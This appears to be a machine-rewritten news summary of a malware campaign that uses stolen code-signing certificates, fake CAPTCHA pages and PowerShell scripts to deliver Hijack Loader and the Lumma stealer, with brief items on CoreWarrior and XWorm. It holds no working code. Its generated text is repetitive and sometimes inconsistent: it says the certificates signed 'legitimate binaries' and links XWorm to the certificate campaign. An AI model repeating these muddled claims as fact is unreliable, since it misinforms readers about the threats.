Ethical Hacking News
A new malware campaign has been uncovered by researchers at French cybersecurity firm HarfangLab, leveraging stolen code-signing certificates to deliver hijack loader malware. This threat serves as a reminder that traditional security measures alone may not be enough to protect against sophisticated cyber attacks.
The cybersecurity world has been hit by a new malware campaign leveraging stolen code-signing certificates.This threat makes traditional security measures ineffective as it uses legitimate code-signing certificates to sign malicious binaries.The malware, known as Hijack Loader or DOILoader, first emerged in September 2023 and has since become a persistent threat.Attack chains involve tricking users into downloading pirated software or movies, often using fake CAPTCHA pages and PowerShell scripts.The ultimate goal is to deploy an information stealer known as Lumma.Researchers observed three different versions of the PowerShell script used in these attacks, each leveraging a different method to execute malicious code.The attack campaign has evolved from DLL side-loading to using signed binaries to evade detection by security software.The use of legitimate code-signing certificates highlights the evolving nature of cyber threats and the need for continuous vigilance.
The cybersecurity world has been hit by a new and sophisticated malware campaign that leverages stolen code-signing certificates to deliver hijack loader malware. Researchers at French cybersecurity firm HarfangLab have uncovered this threat, which involves the use of legitimate code-signing certificates to sign malicious binaries, rendering traditional security measures ineffective.
According to HarfangLab, this malware campaign is part of a larger trend in cyber attacks that involve tricking users into downloading pirated software or movies. However, recent variations of these campaigns have taken a more sophisticated approach, involving fake CAPTCHA pages and PowerShell scripts that execute code hosted on remote servers. The ultimate goal of these attack chains is to deploy an information stealer known as Lumma.
Hijack Loader, also known as DOILoader, IDAT Loader, and SHADOWLADDER, first emerged in September 2023 and has since become a persistent threat. Attack chains involving the malware loader typically involve tricking users into downloading a booby-trapped binary under the guise of pirated software or movies. The latest version of this malware campaign involves the use of stolen code-signing certificates to sign legitimate binaries, making it difficult for security software to detect.
The researchers observed three different versions of the PowerShell script used in these attacks, each leveraging a different method to execute malicious code:
1. A PowerShell script that leverages mshta.exe to execute code hosted on a remote server.
2. A remotely-hosted PowerShell script that's directly executed via the Invoke-Expression cmdlet (aka iex).
3. A PowerShell script that employs msiexec.exe to download and execute a payload from a remote URL.
In addition to these PowerShell scripts, the ZIP archive used in these attacks contains a genuine executable that is susceptible to DLL side-loading and the malicious DLL (i.e., Hijack Loader) that is loaded instead. The purpose of the sideloaded HijackLoader DLL is to decrypt and execute an encrypted file which conceals the final HijackLoader stage, which aims to download and execute a stealer implant.
The delivery mechanism has changed from DLL side-loading to using several signed binaries in early October 2024, in an attempt to evade detection by security software. It's currently not clear if all the code-signing certificates were stolen or intentionally generated by the threat actors themselves, although HarfangLab assessed with low to medium confidence that it could be the latter. The certificates have since been revoked.
This malware campaign serves as a reminder that code signature alone cannot serve as a baseline indicator of trustworthiness. In addition, SonicWall Capture Labs warned of a surge in cyber attacks infecting Windows machines with a malware dubbed CoreWarrior, which is a persistent trojan that attempts to spread rapidly by creating dozens of copies of itself and reaching out to multiple IP addresses.
Another phishing campaign has been observed delivering a commodity stealer and loader malware known as XWorm by means of a Windows Script File (WSF) that, in turn, downloads and executes a PowerShell script hosted on paste[.]ee. The PowerShell script subsequently launches a Visual Basic Script, which acts as a conduit to execute a series of batch and PowerShell scripts to load a malicious DLL that's responsible for injecting XWorm into a legitimate process ("RegSvcs.exe").
The latest version of XWorm (version 5.6) includes the ability to report response time, collect screenshots, read and modify the victim's host file, perform a denial-of-service (DoS) attack against a target, and remove stored plugins, indicating an attempt to avoid leaving a forensic trail.
Netskope Threat Labs security researcher Jan Michael Alcantara stated that XWorm is a multifaceted tool that can provide a wide range of functions to the attacker. The fact that this malware campaign exploits stolen code-signing certificates highlights the evolving nature of cyber threats and the need for continuous vigilance in the cybersecurity landscape.
In conclusion, the discovery of this new malware campaign serves as a wake-up call for organizations and individuals alike. The use of legitimate code-signing certificates to sign malicious binaries is a sophisticated tactic that can be difficult to detect, emphasizing the importance of staying informed about emerging threats and adapting security measures accordingly.
Related Information:
https://thehackernews.com/2024/10/researchers-uncover-hijack-loader.html
Published: Tue Oct 15 03:44:21 2024 by llama3.2 3B Q4_K_M
